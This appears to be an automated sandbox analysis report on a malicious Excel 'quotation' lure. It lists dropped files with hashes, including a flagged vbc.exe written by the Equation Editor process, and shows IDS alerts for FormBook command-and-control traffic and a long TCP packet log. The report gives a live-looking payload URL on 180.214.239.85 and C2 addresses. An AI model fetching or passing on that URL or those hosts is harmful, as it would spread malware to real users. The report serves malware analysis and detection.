SHA-512:	D5FACFCF30E3E9F815F595C3AF6992551D623A5592C13E7AE8DF4E29E7F6401523339BF5A7835D46C80B998FDC3338530EA677F85A08C4FE16829A83879F529F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Joe Sandbox View:	Filename: MV HULDA MAERSK.xlsx, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	http://180.214.239.85/service/rundll32.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Qa..............0..j.............. ........@.. ....................................@.....................................O.......`............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc...`............l..............@..@.reloc...............t..............@..B.......................H........C...............6...Q.........................................."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{.....0..q........(........(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.....*j...(......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45827960.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	65050
Entropy (8bit):	7.959940260382877
Encrypted:	false
SSDEEP:	1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
MD5:	22335141D285E599CDAEF99EABA59D5B
SHA1:	C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
SHA-256:	6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
SHA-512:	CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
Malicious:	false
Preview:	.PNG........IHDR....... ......]....b.zTXtRaw profile type exif..x..Y..8.].9.........L3....UFvU&.d..\|q.;..f..^...........j.W..^...RO=..C.....=......N..).._......=........./...........?....Cl.>.......7...~....'..<...W..{o......q..5~..O.;U.ce>.W.Oxn...-.O......w..I........v..s&.\|x....:......?..u.??P....y.....}q..'..}.?...........}.j..o...I...K......G.._+.U...?..W..+Nnlq.....z....RX.._...3L.1..9.........8.$.._.\....Ln....%.....fh\|...d.\|X.7........_....StC......+.<.7...S\H...i>.{...Nn....../.....#..d.9...s.N..S.P...........Kxr(.1..8....<y\|R..@.9.p}......E.....l......"?.Ui....RF~jj.....s...{~.SR..Z.Qo}j...Zk....i..VZm......LX......./..../?.#.g..G.u...;...f.e..f...Y...^.....6.................}.{.vk............[...........G..I.....7^...:zgw.)Eo.;.{D)r..B.rV....C._....us..]9...[..n...._...........sk.=..9...z...a......e.7.<Vm;....s.w....o./kq.y.w..:q`;..A({.}...w~<.S..WJ.).Zz.c.#`.xN...1.9..1...k.o. ..-.M\|....,..i.[.\.;......8...x.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E5C69E1.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 686x220, frames 3
Category:	dropped
Size (bytes):	104859
Entropy (8bit):	7.948547334191616
Encrypted:	false
SSDEEP:	1536:MsG61be3dUW45hIfxJRv0dWHB3C7oTstUb+wfOA3MKFlYdHTXL1LUbqBGa:23S7idv+UKuZlsb1IbqBGa
MD5:	50B23CFD2E093C27B7624BB70EF7A825
SHA1:	788949A19E6CD30ABD7BE309A513F3D21CFC3064
SHA-256:	BC395AEB9904601F13C40A70318EB5BE8C800C864E86831BE00C061874B7D495
SHA-512:	4F068FBF4AB20DD9C65CC2D67FC802F7D4BC4233460B585F3F5367519095D8CD998A1F02A90CD6642FE4D5195B9EA8A6BA6BC773F722AFEA574B3DE4E7DEA979
Malicious:	false
Preview:	......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......W>....r..m(0.Q..k.<A.d~.....u.J.A..........;g.....8..mf=.2k.....M....J....k.?...~.x....~..~..~.....s.]...G....;...j....8C.P....=..../.o.\.v...C..&...5..F.....U..n,.lmV`._.<.....r..S...z....w[C..v.....8'..ry....~%.?..-m.7.W........p.:q...D.\|.+pH..a.67d.o.K......%.kga..ZE....Ea. .&_5.F.L.8.1F@-%.{n.....F....u[.tM/..m5mm...$.&.I...$L.8..WFh.....de.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90D5CCBD.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F672CAC.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 686x220, frames 3
Category:	dropped
Size (bytes):	104859
Entropy (8bit):	7.948547334191616
Encrypted:	false
SSDEEP:	1536:MsG61be3dUW45hIfxJRv0dWHB3C7oTstUb+wfOA3MKFlYdHTXL1LUbqBGa:23S7idv+UKuZlsb1IbqBGa
MD5:	50B23CFD2E093C27B7624BB70EF7A825
SHA1:	788949A19E6CD30ABD7BE309A513F3D21CFC3064
SHA-256:	BC395AEB9904601F13C40A70318EB5BE8C800C864E86831BE00C061874B7D495
SHA-512:	4F068FBF4AB20DD9C65CC2D67FC802F7D4BC4233460B585F3F5367519095D8CD998A1F02A90CD6642FE4D5195B9EA8A6BA6BC773F722AFEA574B3DE4E7DEA979
Malicious:	false
Preview:	......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......W>....r..m(0.Q..k.<A.d~.....u.J.A..........;g.....8..mf=.2k.....M....J....k.?...~.x....~..~..~.....s.]...G....;...j....8C.P....=..../.o.\.v...C..&...5..F.....U..n,.lmV`._.<.....r..S...z....w[C..v.....8'..ry....~%.?..-m.7.W........p.:q...D.\|.+pH..a.67d.o.K......%.kga..ZE....Ea. .&_5.F.L.8.1F@-%.{n.....F....u[.tM/..m5mm...$.&.I...$L.8..WFh.....de.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC400E1B.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	648132
Entropy (8bit):	2.812377979512145
Encrypted:	false
SSDEEP:	3072:m34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:I4UcLe0JOcXuunhqcS
MD5:	816D69A133BA4D7103958A560A4FD1A7
SHA1:	C242B70AAA47AA1844412103F8CAEA1077AB476F
SHA-256:	6E888B831004EE7215F9E411B88AA2F59806B9E59CBDC03AD00646EC5F9258AB
SHA-512:	E2ED68FF05CDB585BA5688C6BFE0419D38E1550BFB8FBA914E0A053E94F189F9364BF308B9935897ECEF25A11C52C85B8484D15767B0FE476DD3395FFE86D095
Malicious:	false
Preview:	....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................\$.....X..f.\.@..%.....X...X.....t.X...X.RQ.]t.X.l.X.......X.X.X.$Q.]t.X.l.X. ...Id.\l.X.t.X. ............d.\........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............X.X...l.X...X..8.\........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1602797.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	65050
Entropy (8bit):	7.959940260382877
Encrypted:	false
SSDEEP:	1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
MD5:	22335141D285E599CDAEF99EABA59D5B
SHA1:	C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
SHA-256:	6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
SHA-512:	CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
Malicious:	false
Preview:	.PNG........IHDR....... ......]....b.zTXtRaw profile type exif..x..Y..8.].9.........L3....UFvU&.d..\|q.;..f..^...........j.W..^...RO=..C.....=......N..).._......=........./...........?....Cl.>.......7...~....'..<...W..{o......q..5~..O.;U.ce>.W.Oxn...-.O......w..I........v..s&.\|x....:......?..u.??P....y.....}q..'..}.?...........}.j..o...I...K......G.._+.U...?..W..+Nnlq.....z....RX.._...3L.1..9.........8.$.._.\....Ln....%.....fh\|...d.\|X.7........_....StC......+.<.7...S\H...i>.{...Nn....../.....#..d.9...s.N..S.P...........Kxr(.1..8....<y\|R..@.9.p}......E.....l......"?.Ui....RF~jj.....s...{~.SR..Z.Qo}j...Zk....i..VZm......LX......./..../?.#.g..G.u...;...f.e..f...Y...^.....6.................}.{.vk............[...........G..I.....7^...:zgw.)Eo.;.{D)r..B.rV....C._....us..]9...[..n...._...........sk.=..9...z...a......e.7.<Vm;....s.w....o./kq.y.w..:q`;..A({.}...w~<.S..WJ.).Zz.c.#`.xN...1.9..1...k.o. ..-.M\|....,..i.[.\.;......8...x.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3DA066E.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\Desktop\~$(QUOTATION)B-RUS-20061REV2.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	685568
Entropy (8bit):	7.6030295284828995
Encrypted:	false
SSDEEP:	12288:+11lXTqv/Q7zgVAhTQ4HzW0Ikfda+pv0va7bjndt:qDbsVdu5ID+90vMbjd
MD5:	50568FB6133EE4ED721EE46A3C0A9E98
SHA1:	4897B6F2141395071652F72D34DC3D39EB014A56
SHA-256:	2B1A98ADD215568BB5E1C333321CF0FFE98D9128FA149C4F5A07CE2922750B3E
SHA-512:	D5FACFCF30E3E9F815F595C3AF6992551D623A5592C13E7AE8DF4E29E7F6401523339BF5A7835D46C80B998FDC3338530EA677F85A08C4FE16829A83879F529F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Joe Sandbox View:	Filename: MV HULDA MAERSK.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Qa..............0..j.............. ........@.. ....................................@.....................................O.......`............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc...`............l..............@..@.reloc...............t..............@..B.......................H........C...............6...Q.........................................."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{.....0..q........(........(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.....*j...(......

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.989352625928742
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	(QUOTATION)B-RUS-20061REV2.xlsx
File size:	469848
MD5:	ecd068fb962c5a9452a6f22c0725521c
SHA1:	fdf1a902181584d47cb1aed7ac2ca333dcc62e5e
SHA256:	3c3d0f13af1ccf38e72804d40b87dc215813ff6b36a20137d48c4a565c5a5c2e
SHA512:	75e4df2f994c3d582b67a92cc101122a4cb2bf59a8b6d7db6d6733fa8d816a48884a9386a2b34ff2bf625a272a818719e945eaf32bdaa01057bef581f37364e9
SSDEEP:	12288:mHyL81K5G0hgFJQDyq+pNuI2WLp3/Ou3edGpJP:mSL15G0gkyq+pF9bpR
File Content Preview:	........................>...............................................................................{......................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/27/21-14:04:12.525746	TCP	2022566	ET TROJAN Possible Malicious Macro EXE DL AlphaNumL	49165	80	192.168.2.22	180.214.239.85
09/27/21-14:04:12.525746	TCP	2022550	ET TROJAN Possible Malicious Macro DL EXE Feb 2016	49165	80	192.168.2.22	180.214.239.85
09/27/21-14:05:31.207248	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49166	80	192.168.2.22	128.65.195.232
09/27/21-14:05:31.207248	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49166	80	192.168.2.22	128.65.195.232
09/27/21-14:05:31.207248	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49166	80	192.168.2.22	128.65.195.232
09/27/21-14:05:49.561791	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49167	34.102.136.180	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 14:04:12.153249025 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:12.524741888 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:12.525026083 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:12.525746107 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:12.877863884 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:12.877912045 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:12.877931118 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:12.877960920 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:12.878079891 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.248920918 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.248961926 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.248976946 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.248989105 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.249036074 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.249063969 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.249087095 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.249170065 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.249202013 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.249236107 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.608402967 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.608434916 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.608526945 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.608530045 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.608567953 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.608568907 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.608588934 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.608654022 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.608685017 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.608726978 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.608755112 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.608772993 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.608789921 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.608789921 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.608807087 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.608810902 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.608822107 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.608844995 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.609534025 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.609596968 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.609721899 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.609759092 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.609762907 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.609792948 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.609841108 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.609874010 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.611052036 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.956279039 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956306934 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956321001 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956332922 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956346989 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956367016 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956384897 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956459045 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956475973 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956554890 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.956649065 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956666946 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956676960 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.956682920 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956705093 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956712961 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.956722975 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956739902 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.956743956 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956763029 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956763029 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.956789970 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.956815958 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.956829071 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956846952 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956865072 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956882000 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.956892967 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.956918001 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.957036018 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.957119942 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.957277060 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.957330942 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.957556963 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.957616091 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.957717896 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.957752943 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.957763910 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.957789898 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.957792044 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.957832098 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.957835913 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.957876921 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:13.957879066 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.957916975 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:13.960515976 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338285923 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338298082 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338323116 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338340998 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338356972 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338376045 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338399887 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338401079 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338434935 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338455915 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338485003 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338640928 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338656902 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338671923 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338680983 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338687897 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338697910 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338752031 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338761091 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338784933 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338820934 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338830948 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338846922 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338865042 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338865995 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338882923 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338885069 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338898897 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338905096 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338913918 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338916063 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338931084 CEST	80	49165	180.214.239.85	192.168.2.22
